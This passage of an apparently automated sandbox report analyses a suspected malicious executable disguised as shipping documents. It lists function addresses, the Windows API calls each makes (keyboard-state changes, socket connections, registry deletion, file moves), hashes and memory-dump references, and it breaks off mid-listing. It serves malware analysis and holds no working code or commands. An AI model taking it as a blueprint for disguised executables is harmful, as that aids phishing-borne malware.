                                                                                    • API String ID: 3522835683-2766056989
                                                                                    • Opcode ID: e4614b8c38935406f6557d3a2b9861702917ff75c0509d4c83ce8d6a12804142
                                                                                    • Instruction ID: c0b4cffb1eb7b2d52941c3b529eb73159014e9ac9d2a368a7d9f24cf754d9e2c
                                                                                    • Opcode Fuzzy Hash: e4614b8c38935406f6557d3a2b9861702917ff75c0509d4c83ce8d6a12804142
                                                                                    • Instruction Fuzzy Hash: 91614D75A0061ADFCB14EF64C891AAEBBF5FF49310F1480E9E859AB351CB30AD45CB94
                                                                                    Function 00BB0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetParent.USER32(?), ref: 00BB0F8C
                                                                                    • GetKeyboardState.USER32(?), ref: 00BB0FA1
                                                                                    • SetKeyboardState.USER32(?), ref: 00BB1002
                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00BB1030
                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00BB104F
                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00BB1095
                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00BB10B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: 2e2ba70bf6ddba93b79906c9fe52a5f8a27e4d9b7ebf2fa3b0d30386695719db
                                                                                    • Instruction ID: be495988ebda31f124995857444d65172b9dcf9e0d419ded5810f03ca79939b9
                                                                                    • Opcode Fuzzy Hash: 2e2ba70bf6ddba93b79906c9fe52a5f8a27e4d9b7ebf2fa3b0d30386695719db
                                                                                    • Instruction Fuzzy Hash: B351F1606186D53FFB3652388C25BFABEE9DB06304F4889C9E1D5968C2C2D8DCC4D751
                                                                                    Function 00BB0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetParent.USER32(00000000), ref: 00BB0DA5
                                                                                    • GetKeyboardState.USER32(?), ref: 00BB0DBA
                                                                                    • SetKeyboardState.USER32(?), ref: 00BB0E1B
                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00BB0E47
                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00BB0E64
                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00BB0EA8
                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00BB0EC9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: fb9cb1994bc50dd47b6bd15be8a30795ccc14f8920695abe7cd36b9caa30fac9
                                                                                    • Instruction ID: b9f968ba8fdb896456753bb4bb81b65a448379ac7cad453febe58552f62e2b36
                                                                                    • Opcode Fuzzy Hash: fb9cb1994bc50dd47b6bd15be8a30795ccc14f8920695abe7cd36b9caa30fac9
                                                                                    • Instruction Fuzzy Hash: 8B51E3A09286D63EFB3266648855BFBBEE99B06300F0888C9E1D5468C2D3D5EC94D750
                                                                                    Function 00BB55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcsncpy$LocalTime
                                                                                    • String ID:
                                                                                    • API String ID: 2945705084-0
                                                                                    • Opcode ID: 6e012f3b3e8b819db34ca5e173bdae881f7be7f56a0ed907bfb84cbbdd0e9ed1
                                                                                    • Instruction ID: 325e347a746706c763f58740923263ac5d26590f6f523c0e286005c31e4c1110
                                                                                    • Opcode Fuzzy Hash: 6e012f3b3e8b819db34ca5e173bdae881f7be7f56a0ed907bfb84cbbdd0e9ed1
                                                                                    • Instruction Fuzzy Hash: 19419365C1061476CB11EBB48C86ADFB3FC9F04310F50C9A6E52DE3221FB74A655C7AA
                                                                                    Function 00BB3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00BB466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BB3697,?), ref: 00BB468B
                                                                                      • Part of subcall function 00BB466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BB3697,?), ref: 00BB46A4
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00BB36B7
                                                                                    • _wcscmp.LIBCMT ref: 00BB36D3
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00BB36EB
                                                                                    • _wcscat.LIBCMT ref: 00BB3733
                                                                                    • SHFileOperationW.SHELL32(?), ref: 00BB379F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 1377345388-1173974218
                                                                                    • Opcode ID: c9e05e6b40822294fae68a94cfd8468ca6187d38b7c108c5ade6b46258ac3666
                                                                                    • Instruction ID: 81bbbd0a6ab3e973f586ad8948192c6ea9a804f7b25b267e07f56bb40caa97c5
                                                                                    • Opcode Fuzzy Hash: c9e05e6b40822294fae68a94cfd8468ca6187d38b7c108c5ade6b46258ac3666
                                                                                    • Instruction Fuzzy Hash: 31416E7150C344ABC751EF64C451AEFB7E8EF89780F0008AEB49AC3251EB75D689C752
                                                                                    Function 00BD7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BD72AA
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BD7351
                                                                                    • IsMenu.USER32(?), ref: 00BD7369
                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BD73B1
                                                                                    • DrawMenuBar.USER32 ref: 00BD73C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 3866635326-4108050209
                                                                                    • Opcode ID: e15077e76c61787ddd98631213bf8b3e91db14375f50b1894df39eba58814e4c
                                                                                    • Instruction ID: 7c8740a8079c0afba7cdc8abd8af2ef53c24e2cccb79cfbf200087ae21b52cc9
                                                                                    • Opcode Fuzzy Hash: e15077e76c61787ddd98631213bf8b3e91db14375f50b1894df39eba58814e4c
                                                                                    • Instruction Fuzzy Hash: CE414675A44209EFDB20DF50D884AEABBF8FB05324F1480AAFD0597350EB30AD41DB50
                                                                                    Function 00BD0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00BD0FD4
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BD0FFE
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00BD10B5
                                                                                      • Part of subcall function 00BD0FA5: RegCloseKey.ADVAPI32(?), ref: 00BD101B
                                                                                      • Part of subcall function 00BD0FA5: FreeLibrary.KERNEL32(?), ref: 00BD106D
                                                                                      • Part of subcall function 00BD0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00BD1090
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00BD1058
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                    • String ID:
                                                                                    • API String ID: 395352322-0
                                                                                    • Opcode ID: a4e53ee8ec877378ebe64fee81d9d7dff4e8f1dac65b85f784e673ad0c1f2f11
                                                                                    • Instruction ID: 57899ea33dcd88a3855f36bc5d09bc71557dd39f7aee35602385e4960ec6be23
                                                                                    • Opcode Fuzzy Hash: a4e53ee8ec877378ebe64fee81d9d7dff4e8f1dac65b85f784e673ad0c1f2f11
                                                                                    • Instruction Fuzzy Hash: E9311B71901109BFDB15AF94DC99AFFF7BCEF08300F1045AAE512E3241EA749E859BA0
                                                                                    Function 00BD62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00BD62EC
                                                                                    • GetWindowLongW.USER32(00D552E0,000000F0), ref: 00BD631F
                                                                                    • GetWindowLongW.USER32(00D552E0,000000F0), ref: 00BD6354
                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00BD6386
                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00BD63B0
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00BD63C1
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BD63DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongWindow$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 2178440468-0
                                                                                    • Opcode ID: 0cdbf995a83d0dbeda71f1ff3199adf1fb59c220f91831d258889ff3688430f2
                                                                                    • Instruction ID: 2eb160856e515153fbe271aa3c3fae70c8737c8d3fa0e78928fa5001d6f6265d
                                                                                    • Opcode Fuzzy Hash: 0cdbf995a83d0dbeda71f1ff3199adf1fb59c220f91831d258889ff3688430f2
                                                                                    • Instruction Fuzzy Hash: B231F030644251EFEB20CF5CDC84F68BBE1FB5A724F1941A6F5018B2B2EB71A840DB54
                                                                                    Function 00BADAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BADB2E
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BADB54
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00BADB57
                                                                                    • SysAllocString.OLEAUT32(?), ref: 00BADB75
                                                                                    • SysFreeString.OLEAUT32(?), ref: 00BADB7E
                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00BADBA3
                                                                                    • SysAllocString.OLEAUT32(?), ref: 00BADBB1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                    • String ID:
                                                                                    • API String ID: 3761583154-0
                                                                                    • Opcode ID: 2e720a59149f91dfdbe08bffa5085f7f84f8615af90d09d3aac1f752b539bb74
                                                                                    • Instruction ID: 9ef745d3364a93069a6f7367d29df0f00425115586eb5aae76e6c701b5c9b178
                                                                                    • Opcode Fuzzy Hash: 2e720a59149f91dfdbe08bffa5085f7f84f8615af90d09d3aac1f752b539bb74
                                                                                    • Instruction Fuzzy Hash: 6B21A736609219AFDF10DFA8DC84CBB77ECEB09360B458566F916DB250EA70DC418BB0
                                                                                    Function 00BC6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00BC7D8B: inet_addr.WSOCK32(00000000), ref: 00BC7DB6
                                                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00BC61C6
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00BC61D5
                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00BC620E
                                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00BC6217
                                                                                    • WSAGetLastError.WSOCK32 ref: 00BC6221
                                                                                    • closesocket.WSOCK32(00000000), ref: 00BC624A
                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00BC6263
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 910771015-0
                                                                                    • Opcode ID: b6046678d95fe47423da856f5048d5e351418960eb22b56a3553c7238ce26669
                                                                                    • Instruction ID: b4228cd161dbc4249e94f19292177a9e210a6ae10d61459673ae8db7f28addeb
                                                                                    • Opcode Fuzzy Hash: b6046678d95fe47423da856f5048d5e351418960eb22b56a3553c7238ce26669
                                                                                    • Instruction Fuzzy Hash: 00317071604118ABDF10AF64CC85FBAB7E9EF45751F0440ADFD06AB291DB70AD049AA1
                                                                                    Function 00BAF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                    • API String ID: 1038674560-2734436370
                                                                                    • Opcode ID: 8e447f03bed8a389453ed689191774e3279fe1fda89424080eab923164d2aad7
                                                                                    • Instruction ID: 2a78f73e9c63b105f414ea306bb2a712d365d4ec06a9ad1e21b68433ab9669e0
                                                                                    • Opcode Fuzzy Hash: 8e447f03bed8a389453ed689191774e3279fe1fda89424080eab923164d2aad7
                                                                                    • Instruction Fuzzy Hash: CE2134722086127AD220AB78AC02EF773DCEF5A740F1484BAF85A860A1EB509D81D395
                                                                                    Function 00BADBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BADC09
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BADC2F
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00BADC32
                                                                                    • SysAllocString.OLEAUT32 ref: 00BADC53
                                                                                    • SysFreeString.OLEAUT32 ref: 00BADC5C
                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00BADC76
                                                                                    • SysAllocString.OLEAUT32(?), ref: 00BADC84
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                    • String ID:
                                                                                    • API String ID: 3761583154-0
                                                                                    • Opcode ID: 0b09a8518d0b73fadcfbae17984c9ebd3cb1d785169e5c472a4cd4bd424391af
                                                                                    • Instruction ID: bab932414a9f8dbb026fa119a0ac5cf441280d4a6e889c584923d8636a01a1e2
                                                                                    • Opcode Fuzzy Hash: 0b09a8518d0b73fadcfbae17984c9ebd3cb1d785169e5c472a4cd4bd424391af
                                                                                    • Instruction Fuzzy Hash: D1217935609105BF9B10DFA8DC88DBB77ECEB093607508166F916CB660EA70DC41CB64
                                                                                    Function 00BD75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B51D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B51D73
                                                                                      • Part of subcall function 00B51D35: GetStockObject.GDI32(00000011), ref: 00B51D87
                                                                                      • Part of subcall function 00B51D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B51D91
                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BD7632
                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BD763F
                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BD764A
                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BD7659
                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BD7665
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                    • String ID: Msctls_Progress32
                                                                                    • API String ID: 1025951953-3636473452
                                                                                    • Opcode ID: 01bee5a52cc59dacc1c45217c30d40014079b9ecc12cd37c507ff5100f9cb156
                                                                                    • Instruction ID: 2d32113ed6addb12c686b7694d425f546c0dc11412e87eeaac5f96aa251d762b
                                                                                    • Opcode Fuzzy Hash: 01bee5a52cc59dacc1c45217c30d40014079b9ecc12cd37c507ff5100f9cb156
                                                                                    • Instruction Fuzzy Hash: 6E11B6B1150119BFEF158F64CC85EE7BF6DEF08798F014115BA04A21A0EB72DC21DBA4
                                                                                    Function 00B79AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __init_pointers.LIBCMT ref: 00B79AE6
                                                                                      • Part of subcall function 00B73187: EncodePointer.KERNEL32(00000000), ref: 00B7318A
                                                                                      • Part of subcall function 00B73187: __initp_misc_winsig.LIBCMT ref: 00B731A5
                                                                                      • Part of subcall function 00B73187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B79EA0
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B79EB4
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B79EC7
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B79EDA
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B79EED
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00B79F00
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00B79F13
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00B79F26
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00B79F39
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00B79F4C
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00B79F5F
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00B79F72
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00B79F85
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00B79F98
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00B79FAB
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00B79FBE
                                                                                    • __mtinitlocks.LIBCMT ref: 00B79AEB
                                                                                    • __mtterm.LIBCMT ref: 00B79AF4
                                                                                      • Part of subcall function 00B79B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00B79AF9,00B77CD0,00C0A0B8,00000014), ref: 00B79C56
                                                                                      • Part of subcall function 00B79B5C: _free.LIBCMT ref: 00B79C5D
